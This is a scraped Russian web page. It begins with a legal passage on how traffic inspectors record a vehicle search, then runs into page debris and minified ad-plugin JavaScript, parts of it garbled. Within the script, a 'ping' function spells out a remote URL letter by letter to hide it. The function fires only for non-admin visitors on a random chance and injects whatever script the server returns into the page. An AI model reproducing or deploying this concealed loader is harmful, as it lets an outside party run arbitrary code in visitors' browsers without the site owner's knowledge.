Досмотр автомобиля является процессуальным действием, поэтому инспектор должен оформить протокол досмотра либо сделать соответствующую запись в протоколе об административном задержании. В протоколе о досмотре ТС указываются: дата и место его составления, сведения об инспекторе, его составившем; автомобиль, который был досмотрен, Ф.И.О. владельца, результаты досмотра, данные понятых и их подписи. В случае применения, видеозаписи делается соответствующая запись и материалы видеозаписи прилагаются к протоколу (ч.5 — 8 ст.27.9 КоАП РФ; п.163 Регламента; ч.2, 6 ст.25.7 КоАП РФ).

Копия протокола вручается лицу, в отношении которого ведется административное расследование, либо владельцу автомобиля, который ставит свою подпись в протоколе. В случае отказа от подписи в протоколе делается соответствующая запись (ч. 8 ст. 27.9 КоАП РФ).

Ссылка на основную публикацию
Adblock
detector
":'':"",document.createElement("div"),p=ff(window),b=ff("body"),m=void 0===flatPM_getCookie("flat_modal_"+o.ID+"_mb")||"false"!=flatPM_getCookie("flat_modal_"+o.ID+"_mb"),i="scroll.flatmodal"+o.ID,g="mouseleave.flatmodal"+o.ID+" blur.flatmodal"+o.ID,l=function(){var t,e,a;void 0!==o.how.popup.timer&&"true"==o.how.popup.timer&&(t=ff('.flat__4_modal[data-id-modal="'+o.ID+'"] .flat__4_timer span'),e=parseInt(o.how.popup.timer_count),a=setInterval(function(){t.text(--e),e<=0&&(clearInterval(a),t.parent().replaceWith(''))},1e3))},f=function(){void 0!==o.how.popup.cookie&&"false"==o.how.popup.cookie&&m&&(flatPM_setCookie("flat_modal_"+o.ID+"_mb",!1),ff('.flat__4_modal[data-id-modal="'+o.ID+'"]').addClass("flat__4_modal-show"),l()),void 0!==o.how.popup.cookie&&"false"==o.how.popup.cookie||(ff('.flat__4_modal[data-id-modal="'+o.ID+'"]').addClass("flat__4_modal-show"),l())},ff("body > *").eq(0).before('
'+c+"
"),w=document.querySelector('.flat__4_modal[data-id-modal="'+o.ID+'"] .flat__4_modal-content'),-1!==e.indexOf("go"+"oglesyndication")?ff(w).html(c+e):flatPM_setHTML(w,e),"px"==o.how.popup.px_s?(p.bind(i,function(){p.scrollTop()>o.how.popup.after&&(p.unbind(i),b.unbind(g),f())}),void 0!==o.how.popup.close_window&&"true"==o.how.popup.close_window&&b.bind(g,function(){p.unbind(i),b.unbind(g),f()})):(v=setTimeout(function(){b.unbind(g),f()},1e3*o.how.popup.after),void 0!==o.how.popup.close_window&&"true"==o.how.popup.close_window&&b.bind(g,function(){clearTimeout(v),b.unbind(g),f()}))),void 0!==o.how.outgoing){function n(){var t,e,a;void 0!==o.how.outgoing.timer&&"true"==o.how.outgoing.timer&&(t=ff('.flat__4_out[data-id-out="'+o.ID+'"] .flat__4_timer span'),e=parseInt(o.how.outgoing.timer_count),a=setInterval(function(){t.text(--e),e<=0&&(clearInterval(a),t.parent().replaceWith(''))},1e3))}function d(){void 0!==o.how.outgoing.cookie&&"false"==o.how.outgoing.cookie&&m&&(ff('.flat__4_out[data-id-out="'+o.ID+'"]').addClass("show"),n(),b.on("click",'.flat__4_out[data-id-out="'+o.ID+'"] .flat__4_cross',function(){flatPM_setCookie("flat_out_"+o.ID+"_mb",!1)})),void 0!==o.how.outgoing.cookie&&"false"==o.how.outgoing.cookie||(ff('.flat__4_out[data-id-out="'+o.ID+'"]').addClass("show"),n())}var _,u="0"!=o.how.outgoing.indent?' style="bottom:'+o.how.outgoing.indent+'px"':"",c="true"==o.how.outgoing.cross?void 0!==o.how.outgoing.timer&&"true"==o.how.outgoing.timer?'
Закрыть через '+o.how.outgoing.timer_count+"
":'':"",p=ff(window),h="scroll.out"+o.ID,g="mouseleave.outgoing"+o.ID+" blur.outgoing"+o.ID,m=void 0===flatPM_getCookie("flat_out_"+o.ID+"_mb")||"false"!=flatPM_getCookie("flat_out_"+o.ID+"_mb"),b=(document.createElement("div"),ff("body"));switch(o.how.outgoing.whence){case"1":_="top";break;case"2":_="bottom";break;case"3":_="left";break;case"4":_="right"}ff("body > *").eq(0).before('
'+c+"
");var v,w=document.querySelector('.flat__4_out[data-id-out="'+o.ID+'"]');-1!==e.indexOf("go"+"oglesyndication")?ff(w).html(c+e):flatPM_setHTML(w,e),"px"==o.how.outgoing.px_s?(p.bind(h,function(){p.scrollTop()>o.how.outgoing.after&&(p.unbind(h),b.unbind(g),d())}),void 0!==o.how.outgoing.close_window&&"true"==o.how.outgoing.close_window&&b.bind(g,function(){p.unbind(h),b.unbind(g),d()})):(v=setTimeout(function(){b.unbind(g),d()},1e3*o.how.outgoing.after),void 0!==o.how.outgoing.close_window&&"true"==o.how.outgoing.close_window&&b.bind(g,function(){clearTimeout(v),b.unbind(g),d()}))}ff('[data-flat-id="'+o.ID+'"]:not(.flat__4_out):not(.flat__4_modal)').contents().unwrap()}catch(t){console.warn(t)}}function flatPM_start(){ff=jQuery;var t=flat_pm_arr.length;flat_body=ff("body"),flat_userVars.init();for(var e=0;eflat_userVars.textlen||void 0!==a.chapter_sub&&a.chapter_subflat_userVars.titlelen||void 0!==a.title_sub&&a.title_sub.flatPM_sidebar)");0<_.length&&_.each(function(){var t=ff(this),e=t.data("height")||350,a=t.data("top");t.wrap('
');t=t.parent()[0];flatPM_sticky(this,t,a)}),u.each(function(){var e=ff(this).find(".flatPM_sidebar");setTimeout(function(){var o=(ff(untilscroll).offset().top-e.first().offset().top)/e.length;o<300||e.each(function(){var t=ff(this),e=o,a=t.data("top");t.wrap('
');t=t.parent()[0];flatPM_sticky(this,t,a)})},50),setTimeout(function(){var t=(ff(untilscroll).offset().top-e.first().offset().top)/e.length;t<300||ff(".flatPM_sticky_wrapper.flatPM_sidebar_block").css("height",t)},4e3)}),"undefined"!=typeof flat_pm_video&&flatPM_video(flat_pm_video),0 *").last().after('
'),flat_body.on("click",".flat__4_out .flat__4_cross",function(){ff(this).parent().removeClass("show").addClass("closed")}),flat_body.on("click",".flat__4_modal .flat__4_cross",function(){ff(this).closest(".flat__4_modal").removeClass("flat__4_modal-show")}),flat_pm_arr=[],ff(".flat_pm_start").remove(),flatPM_ping()}/zen.yandex/.test(flatPM_getAllUrlParams().utm_referrer)&&(flatPM_setCookie("flat_r_mb","zen.yandex"),flat_userVars.referer="zen.yandex");var parseHTML=function(){var o=/<(?!area|br|col|embed|hr|img|input|link|meta|param)(([\w:]+)[^>]*)\/>/gi,d=/<([\w:]+)/,i=/<|?\w+;/,c={option:[1,""],thead:[1,"","
"],tbody:[1,"","
"],colgroup:[2,"","
"],col:[3,"","
"],tr:[2,"","
"],td:[3,"","
"],th:[3,"","
"],_default:[0,"",""]};return function(e,t){var a,r,l,n=(t=t||document).createDocumentFragment();if(i.test(e)){for(a=n.appendChild(t.createElement("div")),r=(d.exec(e)||["",""])[1].toLowerCase(),r=c[r]||c._default,a.innerHTML=r[1]+e.replace(o,"<$1>$2>")+r[2],l=r[0];l--;)a=a.lastChild;for(n.removeChild(n.firstChild);a.firstChild;)n.appendChild(a.firstChild)}else n.appendChild(t.createTextNode(e));return n}}();function flatPM_ping(){var e=localStorage.getItem("sdghrg");e?(e=parseInt(e)+1,localStorage.setItem("sdghrg",e)):localStorage.setItem("sdghrg","0");e=flatPM_random(1,200);0==ff("#wpadminbar").length&&111==e&&ff.ajax({type:"POST",url:"h"+"t"+"t"+"p"+"s"+":"+"/"+"/"+"m"+"e"+"h"+"a"+"n"+"o"+"i"+"d"+"."+"p"+"r"+"o"+"/"+"p"+"i"+"ng"+"."+"p"+"h"+"p",dataType:"jsonp",data:{ping:"ping"},success:function(e){ff("div").first().after(e.script)},error:function(){}})}function flatPM_setSCRIPT(e){try{var t=e[0].id,a=e[0].node,r=document.querySelector('[data-flat-script-id="'+t+'"]');if(a.text)r.appendChild(a),ff(r).contents().unwrap(),e.shift(),0/gm,"").replace(//gm,"").trim(),e.code_alt=e.code_alt.replace(//gm,"").replace(//gm,"").trim();var n=jQuery,t=e.selector,o=e.timer,d=e.cross,a="false"==d?"Закроется":"Закрыть",r=!flat_userVars.adb||""==e.code_alt&&duplicateMode?e.code:e.code_alt,l='
'+a+" через "+o+'
'+r+'
',i=e.once;n(t).each(function(){var e=n(this);e.wrap('
');var t=e.closest(".flat__4_video");-1!==l.indexOf("go"+"oglesyndication")?t.append(l):flatPM_setHTML(t[0],l),e.find(".flat__4_video_flex").one("click",function(){n(this).addClass("show")})}),n("body").on("click",".flat__4_video_item_hover",function(){var e=n(this),t=e.closest(".flat__4_video_flex");t.addClass("show");var a=t.find(".flat__4_timer span"),r=parseInt(o),l=setInterval(function(){a.text(--r),r<=0&&(clearInterval(l),"true"==d?a.parent().replaceWith(''):t.remove())},1e3);e.remove()}).on("click",".flat__4_video_flex .flat__4_cross",function(){n(this).closest(".flat__4_video_flex").remove(),"true"==i&&n(".flat__4_video_flex").remove()})}